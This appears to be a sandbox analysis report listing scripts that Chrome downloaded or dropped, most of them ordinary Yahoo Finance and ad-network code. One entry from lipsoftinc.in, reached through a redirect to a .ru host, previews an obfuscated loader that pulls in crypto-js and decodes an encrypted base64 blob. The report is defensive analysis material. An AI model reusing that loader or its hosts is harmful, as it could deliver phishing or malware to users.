                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11901), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.106396238513521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ggHWnmGW7GECHay2/WINSyAWRvrhAo1ti:ggHWnmGW7GECHaXN9AWR8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:59AE89307F6BE51355E07ACF3994F79B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A9C5474C652DBC6B60B97C6E723E03A399ACA92D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F54AFF9F498AEFB3479AF7D4F67B5ECE9465B24DB28293A1EE7F32A2230E162F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED56A2963D8ACCC7E316F10138566AA2BA715384418B106997C6525D016BE61C6B7583227DBDFC28704A71248DC8E21CC0E19E8D77D46FF84A3D143FE471FD63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||{},a.wafer.wafers["wafer-loader"]=e())}("undefined"!=typeof self?self:this,function(){return function(a){function e(w){if(r[w])return r[w].exports;var f=r[w]={i:w,l:!1,exports:{}};return a[w].call(f.exports,f,f.exports,e),f.l=!0,f.exports}var r={};return e.m=a,e.c=r,e.d=function(a,r,w){e.o(a,r)||Object.defineProperty(a,r,{configurable:!1,enumerable:!0,get:w})},e.n=function(a){var r=a&&a.__esModule?function(){return a.default}:function(){return a};return e.d(r,"a",r),r},e.o=function(a,e){return Object.prototype.hasOwnProperty.call(a,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"../../manifest.json":function(a,e){a.exports={"wafer-account-switch":{meta:{version:"1.1.7"},modern:{min:"/aaq/wf/wf-account-switch-1.1.7-moder
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1417), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2053
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.97078173240652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:cN7bMoWOS+vmh2aKCQF8QOmEuIJeG58oD:cNuOS+OoDCWO9uIJp58oD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B6F32D11C438665FA485DD650108B9E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D18C9FD6186BCE163A4AF19CB4C622FB9F7DF72F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4227861B6D19FDDB108CC78A3B59A96AED8FB047582962312F28DB21C73830C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:897DC7C49317D250B9DF9F4465C1CE7B1EE7C659E5BEDAD88AE5E0B334493F547EA74A9C1D1064D5B5BC0A741E9D1B1DDFD0AB9FB88D3AD750032BB277CBF8D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://lipsoftinc.in/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yak
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview: var jRRGgGqRUNtQoXDU = document.createElement("script");..jRRGgGqRUNtQoXDU.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(jRRGgGqRUNtQoXDU);..jRRGgGqRUNtQoXDU.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiRVpycGZtckJ5SjEwQzJpTjhaSk1XeDBUZXl5UUN1V0JCS0xkNlVlekZsSnVCVjF2RmhEOWtBcFFrS0ZTd2RhcTRCQXkxN0tqcDRUZlRJOWp6R2IrVXR6bllGcUVMZlNxV1FJUWVMdENhUUQ1VEFESTRhMzF6eUx1emNwdUFcL2JHM2l6VEUzREpEWnR5UmtmV3A2MGhLcllzZ0o2QklBNzVcL2krXC8wOTR2eFZEOWxxOEE4SGo1V0JxOGhcLzNUdlU1Tjd1bzRMRlUwNDNaRmlyaTVPcTRcLzBEK21PVlZlcnRuMjRcL1RFNEJ2NlNFOXVuMXhkZzJhakk0aXZ3WFpkV29POGthMExKZjFWQ3pNb0tNMUw0XC9cL2pBWkZoeFhOUlhpVUtlbm56VVdZeXQ5d1BQUmEzYVZ5QW1sRVJEYVp2dFlSVU1jbDN0VkhkSzhyZGp4QVhSeUMzYW9sVWVPNm5KVGZaWnBEMHY3N0JIWmc5UDlRMkQ2ZDFOd1h6WlwvSE52Tk4xSWJEZGxFR1pCXC9UMVJnWGtKNmlVWW53UmYrSTcxMjRlcXpkYmZ4b0hQWEdqY3BqV1wvQk9YNEplWmkzUmVnaSswdnVWWHhLckRweW41Y2NJeEtpXC81ejR4NWRKWmZRd29sWHFzRjd0WFQ4R01LQmFOSjhVNHhYVXExTk4rdldhK2RcL0NqSG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):83455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.46865625726414
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZFfIMuTGmAwogHWRqBm+SUb0EZugaj8V/MbMfQvVt9a+rGFxZpoArxlPgOuk4kNs:ZdvoG3cBm+SVCNTV/MelrxlPhSFcLtwJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:29675EC6A09583AB5C9CAC1376B922BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:99451B188A3B430F920FB20463435E30EF7F9284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:72EA204ED99417C7BD16B60C5F782FD214C2967ADF7E17C715C64E247782968A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:20AC6705F0AA73486F494DE08D65FEF4AC5388D5CCD91B693555A222F1DE53685ED9449867F6CD628FE76808AA2FBBE8864C010985A3E9216C8E03A16A183745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/srchjs/1.1.97/js/finSearch.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e=this&&this.__assign||function(){return e=Object.assign||function(e){for(var t,s=1,o=arguments.length;s<o;s++)for(var n in t=arguments[s])Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n]);return e},e.apply(this,arguments)},t=1e3,s=60,o=60*s,n=24*o,i=7*n;var r={second:45,minute:45,hour:22,day:5};const l=1500,a=["https://query1.finance.yahoo.com","https://query2.finance.yahoo.com"],c={SEARCH:"/v1/finance/search",TRENDING:"/v1/finance/trending"},d="https://finance.yahoo.com",u="finSearchAutocomplete",h="nav",m="quotes",p="screenerFieldResults",g="lists",_="news",f="recommend",v="researchReports",b="finSearchContext",C="fin-search",y={ALL:"all",RESEARCH_REPORTS:"researchReports",QUOTE:"quote",HOLDERS:"instituationalHolders"},x={[m]:{title:"SYMBOLS"},[_]:{title:"NEWS"},[g]:{title:"LISTS"},[v]:{title:"RELATED_RESEARCH"},[f]:{title:"TRENDING"},[p]:{title:"HOLDERS"}},w={[y.ALL]:[h,m,_,g],[y.RESEARCH_REPORTS]:[h,m,_,v,g],[y.QUOTE]:[m],[y.HOLDERS]:[p]},L={[y.AL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (33589), with LF, NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):58753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.26167812703519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:y5B9KXqe7mdOgKY0hXpXVG8FoAKRXSdRKftld0VTScQI8rdFj8:EB9K6d8gghXnyXSuVld4z8Z6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A9C11221224C7869C6B916618D892612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:39C436EE6D2AFD6F851840AB4673C56CE0372D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7B48A74FA0F94D83AE6D60C772F5E7AA66E7BE1B63CCF223CA14E34D3D7B0D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA05BD1555D819AA35985D16EDA15F9A3805DA01F192156157739E30CE2A22D2888F8E4D1A2ED7A3FC2739CEF848B7EE882A5A628B3657E27AF979FE8F0EB09D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:try{ window.__mNPubCidCB = window.advBidxc.mnetCoRtusId ;/*. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this file,. * You can obtain one at https://github.com/conversant/pubcid.js/blob/master/LICENSE. * Original github code https://github.com/conversant/pubcid.js. */.!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1943)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.958006805781521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:yMxUe71Vc5/VrsgsG5PWkeFVujCmzRrrMgJtevRZC:yMxU84/igsKSnICmNvMgJtERZC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4FC42C6A05FF7CFCC087FD9CB6EAFBC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C99813B2C774DD0D288C397207F20093BDA45430
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5F86AD5CCCFA49FD8C93CF86ABE8D0529CC60AA92E0E606499CFF6F5285A4F6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1AE6E9E8C951EE149453405FA7C65FA706A70B9AB6C226C2B44ACF030818CEBED666F94497E52C240B8A2BB4B488070B2ACC0240611F18C41596BC18D61F1DF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectorNews.B3Fo2MG7.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:section.yf-3v3d6w.yf-3v3d6w{display:flex;flex-direction:column}.title.yf-3v3d6w.yf-3v3d6w{margin-bottom:var(--space-2);font-size:var(--font-3xl);font-weight:var(--font-bold);font-style:var(--font-normal);line-height:115%}.descriptionContainer.yf-3v3d6w.yf-3v3d6w{display:flex;flex-direction:column;gap:var(--space-2)}.descriptionContainer.yf-3v3d6w button.yf-3v3d6w{display:flex;align-items:center;width:-moz-max-content;width:max-content;font-size:var(--font-s);font-weight:var(--font-bold);line-height:125%}.description.yf-3v3d6w.yf-3v3d6w{--clamp-value:4;display:-webkit-box;-webkit-line-clamp:var(--clamp-value);-webkit-box-orient:vertical;overflow:hidden;font-size:var(--font-l);font-weight:var(--font-normal);line-height:130%}.block.yf-3v3d6w.yf-3v3d6w{display:flex;flex-direction:column;gap:var(--space-4)}.content.yf-3v3d6w.yf-3v3d6w{border-radius:var(--border-radius-m);border:1px solid var(--separator);display:flex;flex-direction:row;justify-content:space-between;padding-block:var(--space
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.145878629848918
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:+06pL8mk9o7KJS7jk34LT2+LbngEXHLbQHLT2+Lbw7LbFXTyLT2+Lb27LbMz6/a9:+06mmkiMSfc4++HngEXHHQH++Hw7HFmL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:831E06616F41D1C007E6453597D83E8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BDD088CF1406A687E2A0E5B651A350FEE36054AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B55EF4498629C1D442F1263D339C47B7005EBF78C7D144BCA9075701AACD8C2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:22AD53124EBF26482ED68529552E6AE898C7C8DB7DC475890D51C7790B52AFF283007D0570013E2FDC68875836C272088832227D2957E0900CCFA38520D351FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const a=["dock-rmp","dock-upsell-rmp-dialog","footer-rmp"],c=n=>!n||typeof n!="object"?"":Object.keys(n).map(o=>n[o]!==void 0&&`${o}:${encodeURIComponent(n[o])}`).filter(Boolean).join(";");function r(n){return n?Object.fromEntries(n.split(";").map(o=>{const[e,i]=o.split(":");return[e,decodeURIComponent(i||"")]})):{}}function s(n,o,e,i){if(window&&window.rapidInstance&&typeof window.rapidInstance.beaconClick=="function"){const t=Object.assign({},{etrg:"click"},e.pp);delete e.pp,window.rapidInstance.beaconClick(n,o||"-",e._p||0,e,e.outcm||"clicked",i,{pp:t})}}function d(n,o){window&&window.rapidInstance&&typeof window.rapidInstance.beaconEvent=="function"&&window.rapidInstance.beaconEvent(n,o,o.outcm||"event")}function p(n){window&&window.rapidInstance&&typeof window.rapidInstance.beaconPerformanceData=="function"&&window.rapidInstance.beaconPerformanceData({perf_usertime:{utm:n}})}function f(){const n="nimbus-app",o="nimbus-finheader",{rapidInstance:e}=window;e&&[n,o,...a].forEach(i=>{i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):489606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.518697260783774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:VAFyxeXMn6+WtjSqsTiykUhAGJaf+7N8vxYKe8BmYSFVW9ZuRJi2+o:qUeXMgyksJhN6aKn7EmZA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C6D0D8650C94EA6ADA46306DB5C9A92C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8BD3FFAF67A0A78A4932E49C23EFD5CFAEFD4159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:35E9CCB1D2B7A55AC143B6BA8704E240AE9217D76F1DB2CB735501AF0B5EB765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FA0A3A2DD5C001BB165AED92721BD86065D011B46158262D50CC2A4E6C64135DF749EDF98FACB4013AC29289CA49AEE849F830DFB35A32B68FFE67F89516269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202409240101/pubads_impl.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,da,ia,va,xa,Aa,Ia,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8787), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.18863330580164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:/ZtSSViMOpQGb9yjWipq4Z8Yib8Py50D3X2neFaY5E6ZYrlfxBMn:/rs4Q9egLey5uAHjrlfIn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:446C3635A0812F8C988A5E9CA3FC96A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EFCF277E84D7433A893A01D66CF753705A5F1A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5F0321E77CA2276D46ACBECA4AFDE142BDD748A373B43F89D3740DEC8AFF091D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8597616D6CEB0607556F4F80279E93D727863DFD7BB53EDAE03DAD9C781A17B8D81E518D9403031B97F68BCC835A7E70F7601237391C1ED803ABEF4C55B6D992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-sticky"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(o[i])return o[i].exports;var r=o[i]={i:i,l:!1,exports:{}};return t[i].call(r.exports,r,r.exports,e),r.l=!0,r.exports}var o={};return e.m=t,e.c=o,e.d=function(t,o,i){e.o(t,o)||Object.defineProperty(t,o,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var o=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(o,"a",o),o},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,o){"use strict";function i(t){if(Array.isArray(t)){for(var e=0,o=Array(t.length);e<t.length;e++)o[e]=t[e];return o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1944)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.277146874475536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:ecIZsWoMkq3/6hrrcvgHVlrds9dPS0hVQI9OiQ7rFPw8obr2pVhTQoheC7+7mN9g:ecyFoMkqSWv4Vl63aRCrtd7mz1py7Yna
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F7C90FC743C29B46D878C983F667DC13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:47948BE8922205A4567C79ECA35BE5FEEB39742F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B77E4C5B0C00A04A8A0B126C859F18A2D862609B38761246EF5268CDADAB9F40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E28A5FFE4C4F9456CE71B5D21F1DD568F6951BEA55D492E4C4F68BEAD6B5D02F89E8AC0F81A071FAAA87B4A81CF6EA8421DA31BDD1AF62E54B405D10DE52E1D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as k,c as E,b as v,j as w,k as _,u as I,g as q,a as z,i as r,I as L,p as m,e as N,d as S,f as j,q as D,F,G,n as M,v as R}from"./scheduler.Dsuh-FKt.js";import{S as V,i as A,t as B,a as H}from"./index.CvwOawEI.js";import{i as J}from"./intersectUtil.DVqOQxux.js";const K=n=>({loading:n&2,Component:n&4,hasError:n&8}),d=n=>({loading:n[1],Component:n[2],hasError:n[3]});function p(n){let i,e=n[0]==="visibility"&&g(n);return{c(){e&&e.c(),i=m()},l(t){e&&e.l(t),i=m()},m(t,o){e&&e.m(t,o),_(t,i,o)},p(t,o){t[0]==="visibility"?e?e.p(t,o):(e=g(t),e.c(),e.m(i.parentNode,i)):e&&(e.d(1),e=null)},d(t){t&&r(i),e&&e.d(t)}}}function g(n){let i,e,t;return{c(){i=N("div"),this.h()},l(o){i=S(o,"DIV",{"data-testid":!0}),j(i).forEach(r),this.h()},h(){D(i,"data-testid","lazy-render")},m(o,l){_(o,i,l),e||(t=[F(J.call(null,i,{preset:"beforeview"})),G(i,"intersect",n[4])],e=!0)},p:M,d(o){o&&r(i),e=!1,R(t)}}}function O(n){let i,e,t=n[1]&&p(n);const o=n[7].default,l=E(o,n,n[6],d);return{c(){t&&t.c(),i=v(),l&&l.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17522)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.383575706839626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:l9SWMoNepgrcIn7Q++/OaxBNdiUyMxnGJu5YWB6AVoLnhIxWEY1CCToxI2I6qF7k:fCoY6u6AVoL8ICV1I6q1HYE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69135A246C8485C92D7CDB75346CE1DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D71AE918D4E9736999D7A7E4BD6382F10B632803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3B631E8B0FA4691E3DE85F47675ED6C624C9B62EB2B5D1284BD58D1FF8D09433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FDEB59593D808EF409AC0B2A1C20ED134BFC344061AB68960FB2053F402EBD3B192DB3D107FA6C2390D696AA824B254D7B034A5552E4303BA6A09FEFDF033B3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-ed551f3e.3f4fee857b5980cbe288.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-ed551f3e.3f4fee857b5980cbe288.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7953],{5316:(t,e,n)=>{var i=n(4603);var r,s,o;r="undefined"!=typeof window?window:n.g,s=void 0!==i.mE?i.mE:r.CIQ,o=void 0!==i.vn?i.vn:r.timezoneJS,s.timeZoneMap={"(UTC-05:00) Eastern Time (US and Canada)":"America/New_York","(UTC) Greenwich Mean Time, Reykjavik":"UTC","(UTC) Lisbon, London":"Europe/London","(UTC+09:00) Osaka, Sapporo, Tokyo":"Asia/Tokyo"},function(){var t=("undefined"!=typeof window?window:null)||(void 0!==n.g?n.g:{});o.VERSION="0.4.11";for(var e=t.$||t.jQuery||t.Zepto,i=t.fleegix,r=o.Days=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],a=o.Months=["January","February","March","April","May","June","July","August","September","October","November","December"],u={},h={},c={},l=0;l<a.length;l++)u[a[l].substr(0,3)]=l;for(l=0;l<r.length;l++)h[r[l].substr(0,3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8662)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8663
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.396867395358276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:5de7oEV9u4No3nPKW1Q2tdFMhaRCAfkBuMVGydm3gyAPDb4s14R:5bPKW1Lt8htcCRGam3TAP/d4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F1EDCF2D88FFF89355D1298DFE6C9E0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4C7F52B6087745C75266FAE8F5ED4A6D66CF23E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:43B6773014804C713EE8B3054C90E19E1474AAABD215974D2CB0EFC50F6CEF84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:294AE4DDA8D20F1C4C6D9887CDE8F9CFD01D9361B30A486447EDD43CC41D89C9B25064D9AC4021F0046483EA7B302B08DA3F07ACCEC56352ED699781EBF0C039
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Ticker.Cv4N1gRS.js
